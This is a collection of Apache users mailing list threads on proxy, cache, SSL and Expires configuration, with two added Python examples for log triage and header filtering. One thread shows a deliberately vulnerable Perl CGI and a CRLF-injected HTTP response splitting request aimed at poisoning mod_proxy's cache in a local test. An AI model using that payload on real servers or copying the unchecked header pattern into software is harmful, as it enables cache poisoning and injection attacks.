[EMAIL PROTECTED] apache error_log [] file does not exist and the service hung
Hi,

Firstly, I've done a lot of searching the web before this thread, and that didn't give an answer. Recently, my apache error_log always shows errors such as:

#do ignore the date#
[Thu Mar 9 10:50:30 2006] [error] [client 61.155.85.82] File does not exist: /home/online69/public_html/bbs/image/vzcard1/abg.gif
[Thu Mar 9 12:22:25 2006] [error] [client 61.155.85.82] File does not exist: /home/online69/public_html/bbs/image/vzcard1/abg.gif
[Thu Mar 9 12:22:36 2006] [error] [client 61.155.85.82] File does not exist: /home/online69/public_html/bbs/image/vzcard1/abg.gif
#ignore the date #

And that's not the main problem. The trouble is that httpd needs to deal with many connections which look just like such valid requests, and then the httpd daemon hung in a few minutes.

While I was searching the net for a solution and the reason, it showed that so many people have encountered the issue, but with no solution. If anyone knows the issue, it would be kind of you to give some suggestions. Thanks in advance!

The problem is just the same as in the link http://www.webmasterworld.com/apache/3379921.htm

- The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
" from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
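A way to triage error_log entries like the ones quoted in the message above, as an added example that is not part of the original post: it groups "File does not exist" errors by client and path and flags pairs that repeat inside a short window. The window, the threshold and all sample lines after the first three are constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Shape of the error_log entries quoted in the message above.
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] "
    r"File does not exist: (?P<path>.+)$"
)
GIF = "/home/online69/public_html/bbs/image/vzcard1/abg.gif"

# Sample input: the first three entries are the ones from the message,
# the remaining lines are constructed for this example.
SAMPLE_LOG = [
    "[Thu Mar 9 10:50:30 2006] [error] [client 61.155.85.82] File does not exist: " + GIF,
    "[Thu Mar 9 12:22:25 2006] [error] [client 61.155.85.82] File does not exist: " + GIF,
    "[Thu Mar 9 12:22:36 2006] [error] [client 61.155.85.82] File does not exist: " + GIF,
    "[Thu Mar 9 12:22:41 2006] [error] [client 61.155.85.82] File does not exist: " + GIF,
    "[Thu Mar 9 12:22:47 2006] [error] [client 61.155.85.82] File does not exist: " + GIF,
    "[Thu Mar 9 12:23:02 2006] [error] [client 192.0.2.10] File does not exist: /home/online69/public_html/favicon.ico",
    "[Thu Mar 9 12:23:05 2006] [notice] caught SIGTERM, shutting down",
]

def parse_missing_file(line):
    """Return (timestamp, client_ip, path), or None for any other line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    except ValueError:
        return None  # unparseable timestamp: skip rather than guess
    return ts, m.group("ip"), m.group("path")

def summarize(lines, window=timedelta(minutes=5), threshold=3):
    """Count errors per (client, path); flag pairs that reach
    `threshold` hits inside any span of length `window`."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_missing_file(line)
        if rec:
            ts, ip, path = rec
            hits[(ip, path)].append(ts)
    totals = {key: len(stamps) for key, stamps in hits.items()}
    bursts = set()
    for key, stamps in hits.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            # Slide the window start forward until it fits again.
            while stamps[end] - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                bursts.add(key)
                break
    return totals, bursts

if __name__ == "__main__":
    totals, bursts = summarize(SAMPLE_LOG)
    for (ip, path), count in sorted(totals.items()):
        flag = "BURST" if (ip, path) in bursts else "ok"
        print(f"{flag:5} {count:3} {ip} {path}")
```
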
[EMAIL PROTECTED] Http splitting does not work with mod_proxy
Hi list.

Hope somebody will spend some time on my question :), or point me to the right list.

Does http splitting still work in fresh versions of common applications of apache? I've written a sample application (cgi script) vulnerable to it, however apache mod_proxy just ignores the answer, and initiates a new connection for each request.

Chain: Client (netcat) -> Apache(mod_proxy) -> Apache -> vulnerable cgi. Proxy is on localhost.
Goal: poison mod_proxy's cache

The cgi is:

    #!/usr/bin/perl
    use CGI qw(:standard);
    print "Status: 302 Moved\nLocation: ".param('name')."\n\n";

The attempt to exploit is:

    #nc localhost 80
    GET http://test.xxx/cgi-bin/1.pl?name=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0aGotcha! HTTP/1.1
    Host: test.xxx

    HTTP/1.1 302 Moved
    Date: Thu, xx Nov 2007 xx:25:03 GMT
    Server: Apache/2.0.xx (Unix) mod_ssl/2.0.xx OpenSSL/xxx DAV/2
    Location: Foo
    Content-Length: 0
    Content-Type: text/plain
    Via: 1.1 client.xxx (Apache/2.xx)

    GET http://test.xxx/1.html HTTP/1.1
    Host: test.xxx

    HTTP/1.1 200 OK
    Date: Thu, xx Nov 2007 15:25:09 GMT
    Server: Apache/2.xx (Unix) mod_ssl/2.xx OpenSSL/0.xx DAV/2
    Last-Modified: Thu, xx Nov 2007 xxx GMT
    ETag: "2c8be-2-c4f7b640"
    Accept-Ranges: bytes
    Content-Length: 2
    Content-Type: text/html

    1

However, as I've found, mod_proxy initiates a new connection for the second GET. That breaks the whole idea to exploit http splitting. Is it some kind of new protection feature in apache mod_proxy?

Please, could anybody provide a brief description of common applications on which the attack is working. It seems vendors have done a great job (like filtering characters in PHP header, or Tomcat).

Feel free to ask any questions to get more info.

--
Best regards.
Gleb Pakharenko.
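The header-value filtering that the post above credits vendors with, as an added example that is not part of the original post: a Python rendering of the posted CGI's redirect next to a version that refuses CR, LF and other control characters, plus a small parser showing where a server reading the CGI output ends the header block. The function names and both sample values are constructed for this example.

```python
from urllib.parse import unquote

# Constructed sample values (URL-encoded, as they would arrive in the query).
SAMPLE_EXTRA_HEADER = "Foo%0d%0aX-Injected:%20yes"
SAMPLE_EARLY_END = "Foo%0d%0a%0d%0aextra"

EXPECTED_HEADERS = ("Status", "Location")


class HeaderInjectionError(ValueError):
    """Raised when a header value contains a control character."""


def redirect_unsafe(name):
    # Same behaviour as the posted CGI: the decoded parameter is
    # concatenated into the Location header without any check.
    return "Status: 302 Moved\nLocation: " + name + "\n\n"


def redirect_safe(name):
    # Reject CR, LF and every other control character before the value
    # gets anywhere near the header block.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in name):
        raise HeaderInjectionError("control character in header value")
    return "Status: 302 Moved\nLocation: " + name + "\n\n"


def header_block(response):
    """Split CGI output into (header_lines, body); the header block
    ends at the first blank line."""
    normalized = response.replace("\r\n", "\n")
    head, _, body = normalized.partition("\n\n")
    return head.split("\n"), body


def unexpected(response):
    """Return (headers the script never meant to send, body)."""
    headers, body = header_block(response)
    extra = [h for h in headers if h.split(":", 1)[0] not in EXPECTED_HEADERS]
    return extra, body


if __name__ == "__main__":
    for raw in (SAMPLE_EXTRA_HEADER, SAMPLE_EARLY_END):
        value = unquote(raw)  # the CGI layer decodes %0d%0a to CR LF
        print(repr(value), "->", unexpected(redirect_unsafe(value)))
        try:
            redirect_safe(value)
        except HeaderInjectionError as exc:
            print("  rejected:", exc)
```
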
[EMAIL PROTECTED] Getting mod_perl to run after mod_cache with Apache 2.2.6
Hi Folks,

I originally posted this message on the mod_perl mailing list, but I did not receive any responses, so I'm posting here in the hopes that someone can help me out.

My current LAMP stack is using Apache 2.0.54 and mod_perl 2.0.0-RC4, and I'm doing something very much like what is mentioned in a previous mod_perl mailing list post from 2 years ago, the thread of which can be seen here:

http://www.gossamer-threads.com/lists/modperl/modperl/79672

In summary (taking from the above posting), here's a simple flow of what we have happening:

1 - mod_cache [..got valid content in cache? If so, go to 4; if not, go to 2]
2 - mod_proxy [fetch content from origin web]
3 - mod_cache [content cacheable? If so, cache it locally]
4 - *MY FILTER*
5 - deflate

Using the same modifications mentioned in the above posting, we were able to get mod_cache to run *before* mod_perl by changing mod_cache.c so that the CACHE_SAVE and CACHE_OUT filters hook in at AP_FTYPE_CONTENT_SET-2, and changing mod_perl.c so that mod_perl hooks in at AP_FTYPE_CONTENT_SET-1. This solution is mentioned at the bottom of the above posting.

But now I am upgrading our LAMP stack to Apache 2.2.6 and mod_perl 2.0.3, and I'm having trouble getting the above flow to work.

First off, mod_cache.c has changed so that instead of just CACHE_SAVE and CACHE_OUT, there are also CACHE_SAVE_SUBREQ and CACHE_OUT_SUBREQ. I'm not sure what the subrequests are really for, but here's what I've been doing to try to get my desired flow to work:

The original Apache 2.2.6 filter order for mod_cache is:

    CACHE_SAVE = AP_FTYPE_CONTENT_SET+1
    CACHE_SAVE_SUBREQ = AP_FTYPE_CONTENT_SET-1
    CACHE_OUT = AP_FTYPE_CONTENT_SET+1
    CACHE_OUT_SUBREQ = AP_FTYPE_CONTENT_SET-1

The original mod_perl 2.0.3 filter order is:

    MODPERL_REQUEST_OUTPUT = AP_FTYPE_RESOURCE

I've modified these to be:

Modified Apache 2.2.6 filter order for mod_cache:

    CACHE_SAVE = AP_FTYPE_CONTENT_SET-2
    CACHE_SAVE_SUBREQ = AP_FTYPE_CONTENT_SET-3
    CACHE_OUT = AP_FTYPE_CONTENT_SET-2
    CACHE_OUT_SUBREQ = AP_FTYPE_CONTENT_SET-3

Modified mod_perl 2.0.3 filter order:

    MODPERL_REQUEST_OUTPUT = AP_FTYPE_CONTENT_SET-1

These modifications make it (theoretically from what I understand about the filtering order numbers and my experience with the older Apache and mod_perl) so that mod_perl runs after mod_cache, in the same way that I was able to do this for Apache 2.0.54 and mod_perl 2.0.0-RC4.

However it is not working as I expected -- mod_cache appears to not be returning the body of the content before my mod_perl filter is run. So the user hits the site, mod_cache sees the page is cached, mod_perl is run but doesn't see any content, only the headers, then somewhere down the line mod_cache must be serving up the cached content after mod_perl.

So, I'm stumped. Can anyone point me in the right direction?

Thanks!
[EMAIL PROTECTED] Apache 2.2.6, problem with mod_proxy: "ProxyPass|ProxyPassMatch can not have a path when defined in a location."
Hi,

I am running the latest version of XAMPP provided by Apachefriends.org. The software includes Apache 2.2.6 and I am trying to configure a reverse proxy. The modules are loaded but the following lines make Apache unhappy and complain about my configuration:

    ProxyPass /a/ http://localhost:8080/
    ProxyPass /b/ http://localhost:/

Now when starting the Apache I do get the following error message for a syntax check (which corresponds exactly to those lines):

    /opt/lampp/bin/httpd -t -f /opt/lampp/etc/httpd.conf
    Syntax error on line 236 of /opt/lampp/etc/httpd.conf:
    ProxyPass|ProxyPassMatch can not have a path when defined in a location.

Does anyone know what my mistake here is? I have searched the manual and googled for the problem but I didn't find any answer. Thanks!

Best regards,
Werner
Re: [EMAIL PROTECTED] Apache 2.2.6, problem with mod_proxy: "ProxyPass|ProxyPassMatch can not have a path when defined in a location."
On Thu, Nov 29, 2007 at 05:12:12PM +0100, Werner Schalk wrote:
> Hi,
>
> I am running the latest version of XAMPP provided by Apachefriends.org. The
> software includes Apache 2.2.6 and I am trying to configure a reverse
> proxy. The modules are loaded but the following lines make Apache unhappy
> and complain about my configuration:
>
> ProxyPass /a/ http://localhost:8080/
> ProxyPass /b/ http://localhost:/
>
> Now when starting the Apache I do get the following error message for a
> syntax check (which corresponds exactly to those lines):
>
> /opt/lampp/bin/httpd -t -f /opt/lampp/etc/httpd.conf
> Syntax error on line 236 of /opt/lampp/etc/httpd.conf:
> ProxyPass|ProxyPassMatch can not have a path when defined in a location.
>
> Does anyone know what my mistake here is? I have searched the manual and
> googled for the problem but I didn't find any answer. Thanks!
>

I would guess it's because your config actually looks something like:

    ProxyPass /a/ http://localhost:8080/
    ProxyPass /b/ http://localhost:/
    ...

maybe?

--
===
Jim Jagielski [|] [EMAIL PROTECTED] [|] http://www.jaguNET.com/
"Great is the guilt of an unnecessary war" ~ John Adams
Re: [EMAIL PROTECTED] Getting mod_perl to run after mod_cache with Apache 2.2.6
On Thu, 29 Nov 2007 11:05:27 -0500 "Adam Woodworth" <[EMAIL PROTECTED]> wrote:

> In summary (taking from the above posting), here's a simple flow of
> what we have happening:
>
> 1 - mod_cache [..got valid content in cache? If so, go to 4; if not,
> go to 2]
> 2 - mod_proxy [fetch content from origin web]
> 3 - mod_cache [content cacheable? If so, cache it locally]
> 4 - *MY FILTER*
> 5 - deflate

That makes sense if and only if you want to repeat your-filter and DEFLATE on every request rather than cache the ready-processed contents.

In principle, mod_filter enables you to control the ordering of output filters, so you could just configure the above with a FilterChain directive. The problem with that is that mod_cache does its own thing.

I suspect the easiest solution may be to use mod_cache's filters but without using mod_cache's handler. I'm not sure how much work that'll involve: presumably mod_cache can largely be cloned, except for the insert-filters bit. Doing it in Perl with mod_perl should be an option.

--
Nick Kew

Application Development with Apache - the Apache Modules Book
http://www.apachetutor.org/
Re: [EMAIL PROTECTED] Getting mod_perl to run after mod_cache with Apache 2.2.6
Hi Nick,

Thanks for the response!

> > 1 - mod_cache [..got valid content in cache? If so, go to 4; if not,
> > go to 2]
> > 2 - mod_proxy [fetch content from origin web]
> > 3 - mod_cache [content cacheable? If so, cache it locally]
> > 4 - *MY FILTER*
> > 5 - deflate
>
> That makes sense if and only if you want to repeat your-filter and
> DEFLATE on every request rather than cache the ready-processed contents.

Yup, due to the nature of our product, our mod_perl filter doesn't do the same thing for each request to the same page.

> directive. The problem with that is that mod_cache does its own thing.

Could you elaborate on what you mean by mod_cache doing its own thing?

The problem I seem to be running into is that when my mod_perl filter runs, mod_cache has served up the headers of the file, but the content of the file is empty, so mod_perl has nothing to process. Then somewhere down the line mod_cache must serve up the rest of the file. Do you know how this might be happening, or if it's just the way mod_cache operates? Is there perhaps some interaction with mod_proxy where mod_cache only spits out the cached data at some particular point in the filter chain...

I'm going to dig into mod_cache deeper now...

Thanks!
Adam
Re: [EMAIL PROTECTED] Reverse SSL Proxy Question
> I've configured a reverse SSL proxy using Apache 2.0.
>
> However, the application server serving the pages includes a
> line that gets stripped out by the proxy.
>
> One thing I read was
> http://www.apachetutor.org/admin/reverseproxies
> and it makes mention of problems under "changing the
> FPI". The solution is to, "set the doctype explicitly."
>
> Does anyone have any hints or workarounds?
> === Al

I figured it out and thought I'd post the solution.

I'm using mod_proxy_html. There are directives that are included with that module which are detailed here:
http://apache.webthing.com/mod_proxy_html/config.html

The ProxyHTMLDoctype directive is relevant to what I was trying to do.

=== Al
[EMAIL PROTECTED] SSL & Apache Scalability
Hi All,

I have heard a strange story about how using 1 port for Apache SSL is not a good idea for performance. I heard if you have three sites using the same SSL port it could really slow down performance as compared to putting those sites on separate ports for SSL.

Should not each site have its own port for SSL?

Thanks,
-Tony
Re: [EMAIL PROTECTED] Getting mod_perl to run after mod_cache with Apache 2.2.6
After some more digging, I've figured out (mostly) what is going on.

It turns out that our mod_perl filter actually does get the body content from mod_cache -- originally I thought that our filter wasn't seeing the body at all. But, the Content-Type header is missing.

In cache_storage.c, around line 120 (in the 2.2.6 source code) there is this code:

    apr_table_unset(h->resp_hdrs, "Content-Type");
    /*
     * Also unset possible Content-Type headers in r->headers_out and
     * r->err_headers_out as they may be different to what we have received
     * from the cache.
     * Actually they are not needed as r->content_type set by
     * ap_set_content_type above will be used in the store_headers functions
     * of the storage providers as a fallback and the HTTP_HEADER filter
     * does overwrite the Content-Type header with r->content_type anyway.
     */
    apr_table_unset(r->headers_out, "Content-Type");
    apr_table_unset(r->err_headers_out, "Content-Type");

While I'm not clear why this is happening, mod_cache is clearing out the Content-Type header from the response. So, our mod_perl filter doesn't see the content-type filter and I think that content-type gets set again by Apache somewhere after all the filters run. Since Content-Type is missing during mod_perl's running, and our mod_perl filter triggers off of Content-Type matching certain types (normally, text/html), our filter doesn't do anything to the body because the Content-Type is missing.

I was able to "fix" this by commenting out the apr_table_unset(h->resp_hdrs, ... line above.

Does anyone know the effect that this could have on the rest of mod_cache/etc (any ill effects, cases where this would break something, etc?), and why exactly the Content-Type is removed in the first place by mod_cache? I see that the comments above try to explain it, but it doesn't quite make sense to me.

Cheers,
Adam

On Nov 29, 2007 2:27 PM, Adam Woodworth <[EMAIL PROTECTED]> wrote:
> Hi Nick,
>
> Thanks for the response!
>
> > > 1 - mod_cache [..got valid content in cache? If so, go to 4; if not,
> > > go to 2]
> > > 2 - mod_proxy [fetch content from origin web]
> > > 3 - mod_cache [content cacheable? If so, cache it locally]
> > > 4 - *MY FILTER*
> > > 5 - deflate
> >
> > That makes sense if and only if you want to repeat your-filter and
> > DEFLATE on every request rather than cache the ready-processed contents.
>
> Yup, due to the nature of our product, our mod_perl filter doesn't do
> the same thing for each request to the same page.
>
> > directive. The problem with that is that mod_cache does its own thing.
>
> Could you elaborate on what you mean by mod_cache doing its own thing?
>
> The problem I seem to be running into is that when my mod_perl filter
> runs, mod_cache has served up the headers of the file, but the content
> of the file is empty, so mod_perl has nothing to process. Then
> somewhere down the line mod_cache must serve up the rest of the file.
> Do you know how this might be happening, or if it's just the way
> mod_cache operates? Is there perhaps some interaction with mod_proxy
> where mod_cache only spits out the cached data at some particular
> point in the filter chain...
>
> I'm going to dig into mod_cache deeper now...
>
> Thanks!
> Adam
>
Re: [EMAIL PROTECTED] SSL & Apache Scalability
Tony Anecito wrote:

Hi All,

I have heard a strange story about how using 1 port for Apache SSL is not a good idea for performance. I heard if you have three sites using the same SSL port it could really slow down performance as compared to putting those sites on separate ports for SSL.

Should not each site have its own port for SSL?

End original message.

Where did you hear that?

What is true is that you cannot do name-based virtual hosts on the same IP address with multiple domain names and have that work correctly (that subject comes up here all the time). Basically, you have to use a separate IP address for each domain name so that SSL negotiation serves the correct certificate for the domain. This is a limitation of the protocol that establishes SSL connections and there is really no legitimate way around how it works. (There is a way to "cheat" and use "wild card certificates" but that is considered bad practice and should not be done).

All of these IP addresses can and should run on port 443 for SSL unless you have another compelling reason to do something different. Each of these instances will be separate ports because each IP address has its own set of ports that are not shared. In other words, port 443 on IP 192.168.1.100 is not the same as port 443 on IP 10.3.67.24

Perhaps the requirement for a unique IP address is the source of the confusion?

Dragon

~~~
Venimus, Saltavimus, Bibimus (et naribus canium capti sumus)
~~~
Re: [EMAIL PROTECTED] SSL & Apache Scalability
On Nov 29, 2007, at 1:58 PM, Tony Anecito wrote:

> I have heard a strange story about how using 1 port
> for Apache SSL is not a good idea for performance. I

Sounds like something for Mythbusters!

> heard if you have three sites using the same SSL port
> it could really slow down performance as compared to
> putting those sites on separate ports for SSL.
>
> Should not each site have its own port for SSL?

For all practical purposes, each SSL site will have its own IP address. This has much the same effect as running the sites on different ports: each virtual host will have its own listener.

S.

--
Sander Temme
[EMAIL PROTECTED]
PGP FP: 51B4 8727 466A 0BC3 69F4 B7B8 B2BE BC40 1529 24AF
Re: [EMAIL PROTECTED] SSL & Apache Scalability
Thanks. I will send these email feedbacks to the person who mentioned it to me and make sure I heard it right.

Many Thanks!
-Tony

--- Sander Temme <[EMAIL PROTECTED]> wrote:

>
> On Nov 29, 2007, at 1:58 PM, Tony Anecito wrote:
>
> > I have heard a strange story about how using 1 port
> > for Apache SSL is not a good idea for performance. I
>
> Sounds like something for Mythbusters!
>
> > heard if you have three sites using the same SSL port
> > it could really slow down performance as compared to
> > putting those sites on separate ports for SSL.
> >
> > Should not each site have its own port for SSL?
>
> For all practical purposes, each SSL site will have its own IP
> address. This has much the same effect as running the sites on
> different ports: each virtual host will have its own listener.
>
> S.
>
> --
> Sander Temme
> [EMAIL PROTECTED]
> PGP FP: 51B4 8727 466A 0BC3 69F4 B7B8 B2BE BC40 1529 24AF
>
[EMAIL PROTECTED] strange expires problem
users, hello!

I have trouble with setting the expires time with apache! I want to use the expires statement to control the cache time, but a strange problem occurred!

When I set

    ExpiresActive on
    ExpiresByType text/html A61

the cache server (squid) works correctly and the expires time is 61 seconds! But if I set the time to less than 61, the cache server can't cache!!

    ExpiresActive on
    ExpiresByType text/html A60

I found 60 seconds is a bottleneck whether I use apache 2.0.X or 2.2.X, and I found it's a puzzle for me!
Re: [EMAIL PROTECTED] strange expires problem
On 30/11/2007, goommy <[EMAIL PROTECTED]> wrote:
> users, hello!

Uh, hi.

> I have trouble with setting the expires time with apache!
> I want to use the expires statement to control the cache time, but a strange
> problem occurred!
>
> When I set ExpiresActive on
> ExpiresByType text/html A61 ,
> the cache server (squid) works correctly and the expires time is 61 seconds!

This appears to be a default behaviour for squid.

http://www2.tw.squid-cache.org/Versions/v2/2.6/cfgman/minimum_expiry_time.html

--
noodl